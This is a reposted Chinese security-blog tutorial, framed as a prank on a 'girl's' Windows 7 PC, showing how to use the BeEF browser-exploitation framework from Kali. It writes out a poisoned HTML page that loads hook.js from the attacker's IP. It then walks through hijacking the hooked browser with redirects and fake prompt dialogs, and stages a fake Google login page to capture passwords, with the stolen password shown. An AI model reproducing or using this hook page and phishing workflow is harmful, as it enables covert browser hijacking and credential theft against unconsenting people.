

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="qt">
  <meta name="keywords" content="">
  <title>内网漫步之如何调戏妹纸 - qt安全博客</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.5","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>qt安全博客</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="内网漫步之如何调戏妹纸">
              
                内网漫步之如何调戏妹纸
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2019-07-24 08:00" pubdate>
        2019年7月24日 早上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      13
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">内网漫步之如何调戏妹纸</h1>
            
            <div class="markdown-body">
              <p>今天在一个大佬的博客发现了一个挺有意思的小东西，下载开始搬砖：</p>
<h3 id="环境说明："><a href="#环境说明：" class="headerlink" title="环境说明："></a>环境说明：</h3><ul>
<li>kali linux(192.168.0.114) 黑阔滴设备</li>
<li>win7 (192.168.0.113) 妹纸的pc</li>
</ul>
<h3 id="认识beef"><a href="#认识beef" class="headerlink" title="认识beef"></a>认识beef</h3><p><code>BEEF</code> (The Browser Exploitation Framework)：一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。</p>
<p><code>BeEF</code>主要是往网页中插入一段名为<code>hook.js</code>的JS脚本代码，如果浏览器访问了有<code>hook.js</code>(钩子)的页面，就会被hook(勾住)，勾连的浏览器会执行初始代码返回一些信息，接着目标主机会每隔一段时间（默认为1秒）就会向BeEF服务器发送一个请求，询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用，被分为前端和后端。前端会轮询后端是否有新的数据需要更新，同时前端也可以向后端发送指示， BeEF持有者可以通过浏览器来登录 BeEF 的后端，来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。 <img src="https://niu.bbskali.cn/42cbb8cd999212d14dd67e44c706dd59" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<h3 id="启动BEEF"><a href="#启动BEEF" class="headerlink" title="启动BEEF"></a>启动BEEF</h3><p>方法一：点击栏目中的图标即可启动。 方法二：执行命令<code>beef-xss</code> kali已经把beef-xss做成服务了，我们也可以使用systemctl 命令来启动或关闭beef服务</p>
<pre><code class="hljs shell">systemctl start beef-xss.service         #开启beef服务
systemctl stop beef-xss.service         #关闭beef服务
systemctl restart beef-xss.service      #重启beef服务</code></pre>

<p>Shell</p>
<p><img src="https://niu.bbskali.cn/598c335560fe6f6affc8114788ea4f72" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"> <strong>注意：</strong>初次配置要求我们输入我们的账号和密码（自行设定） 启动完成后，会自动跳转到浏览器的管理页面。输入我们刚才设置的账号和密码，登入系统。初始账号和密码均为<code>beef</code> <img src="https://niu.bbskali.cn/472b85a471f332b8176e66d4c488079e" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<h3 id="配置我们的钩子"><a href="#配置我们的钩子" class="headerlink" title="配置我们的钩子"></a>配置我们的钩子</h3><p>方法有两种这里简单说下： 方法一：找含有xss漏洞的网站，插入js达到攻击目标。 方法二：自己写一个含有毒化的网页，让他人访问。（内网+外网） 这里以方法二为列：写个简单的页面。</p>
<pre><code class="hljs html"><span class="hljs-meta">&lt;!doctype <span class="hljs-meta-keyword">html</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">charset</span>=<span class="hljs-string">&quot;utf-8&quot;</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>啦啦啦<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span>

<span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">h1</span>&gt;</span>bbskali.cn<span class="hljs-tag">&lt;/<span class="hljs-name">h1</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;http://192.168.0.114:3000/hook.js&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span></code></pre>

<p>HTML</p>
<p>也就是说，想办法让别人访问我刚才写的这个页面。即可达到攻击的目标。方法比较多，如中间人攻击，重定向，挂黑页等等。</p>
<h3 id="攻击演示"><a href="#攻击演示" class="headerlink" title="攻击演示"></a>攻击演示</h3><h4 id="演示一-（设备上线）"><a href="#演示一-（设备上线）" class="headerlink" title="演示一 （设备上线）"></a>演示一 （设备上线）</h4><p>当攻击端访问我们的网页，在<code>beef</code>控制台中我们就可以看到上线的设备。 <img src="https://niu.bbskali.cn/7a06f40561d103c523ce1845af305705" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<h3 id="设备攻击"><a href="#设备攻击" class="headerlink" title="设备攻击"></a>设备攻击</h3><p>点击我们的设备，选择<code>commands</code>选项卡，我们可以看到有很多攻击模块。 <img src="https://niu.bbskali.cn/ca9a915081a8a15bf3f4ce03e01d0171" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<p>读者可能发现在每个模块的前面都有一个有色（绿色，灰色，橙色，红色）的小圆标志。</p>
<p>在内部，BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作， 并用颜色表示：</p>
<p><code>绿色</code>：命令模块可以在目标浏览器上运行，且用户不会感到任何异常</p>
<p><code>橙色</code>：命令模块可以在目标浏览器上运行，但是用户可能会感到异常（比如可能会有弹窗，提示，跳转等）</p>
<p><code>灰色</code>：命令模块尚未针对此目标进行验证，即不知道能否可运行</p>
<p><code>红色</code>：命令模块不适用于此目标 这里给大家演示几个模块。其他的大家自己自娱自乐！</p>
<h4 id="让浏览器自动访问指定的网站"><a href="#让浏览器自动访问指定的网站" class="headerlink" title="让浏览器自动访问指定的网站"></a>让浏览器自动访问指定的网站</h4><p>点击<code>Browser</code>--<code>hooked Doman</code> –<code>Redirect Browser</code>输入我们的目标网址后点击<code>Execute</code>即可完成攻击。返回到刚才打开的页面，发现自动跳转到了kali论坛。</p>
<p><img src="https://niu.bbskali.cn/9976f202e77c74dacc3dba8ac8679c91" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<h4 id="弹出对话框"><a href="#弹出对话框" class="headerlink" title="弹出对话框"></a>弹出对话框</h4><p>点击<code>Browser</code>--<code>hooked Doman</code> –<code>Create Alert Dialog</code>输入我们要弹出的信息后点击<code>Execute</code>即可完成攻击。 <img src="https://niu.bbskali.cn/88fc4b7f5138e3c7c9139aabcfd61526" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"> 效果如下： <img src="https://niu.bbskali.cn/ff70451cce093d43031a9d67c32df77e" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<h4 id="弹出输入信息框"><a href="#弹出输入信息框" class="headerlink" title="弹出输入信息框"></a>弹出输入信息框</h4><p>点击<code>Browser</code>--<code>hooked Doman</code> –<code>Create Prompt Dialog</code>输入我们要弹出的信息后点击<code>Execute</code>即可完成攻击。 <img src="https://niu.bbskali.cn/5128ca60794bf945178536329b0cf681" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"> 同样的方式，当我们输入信息后，即可在管理面板看到刚才输入的信息！ <img src="https://niu.bbskali.cn/03813c3d4542cfb37d7197191d7adc93" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"> 结果： <img src="https://niu.bbskali.cn/bdb3a1135198637b3ce92a7d9a168630" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<h4 id="制作钓鱼网站"><a href="#制作钓鱼网站" class="headerlink" title="制作钓鱼网站"></a>制作钓鱼网站</h4><p>选择<code>Scoial Engineering</code>--<code>Google phishing</code>改为我们kali的ip地址。点击<code>Execute</code> <img src="https://niu.bbskali.cn/a24799830939026091d043d3ea2f050c" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"> 我们的页面变成了google的登录页面 <img src="https://niu.bbskali.cn/52d2192e6f7fac9b8b6dd90ae4f20a08" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<p>输入我们的账号和密码 <img src="https://niu.bbskali.cn/aceb288127732f06aa848c8ea568827c" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"> 获取到的密码</p>
<p><img src="https://niu.bbskali.cn/3e26c400e5e0594df8460f005cf18a33" srcset="/img/loading.gif" alt="请输入图片描述" title="请输入图片描述"></p>
<p>转载</p>
<p>版权属于：逍遥子</p>
<p>本文链接：<a target="_blank" rel="noopener" href="https://blog.bbskali.cn/index.php/archives/1366/">https://blog.bbskali.cn/index.php/archives/1366/</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                    
                  </div>
                
                
              </div>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2019/07/25/linux-%E8%BF%90%E7%BB%B4%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/index/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Linux 运维常用命令</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2019/07/23/sql%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E4%BC%A0%E5%8F%82%E5%8E%BB%E6%8E%89%E4%B8%80%E4%B8%AA%E6%9C%80%E9%AB%98%E5%88%86%E4%B8%80%E4%B8%AA%E6%9C%80%E4%BD%8E%E5%88%86/index/">
                        <span class="hidden-mobile">sql自定义函数传参去掉一个最高分一个最低分</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
            
                
                
  <script type="text/javascript">
    Fluid.utils.waitElementVisible('comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'JWQTA/JWQTA.github.io');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('label', 'duplicate');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     ©qt <i class="iconfont icon-love"></i>

  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>







  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
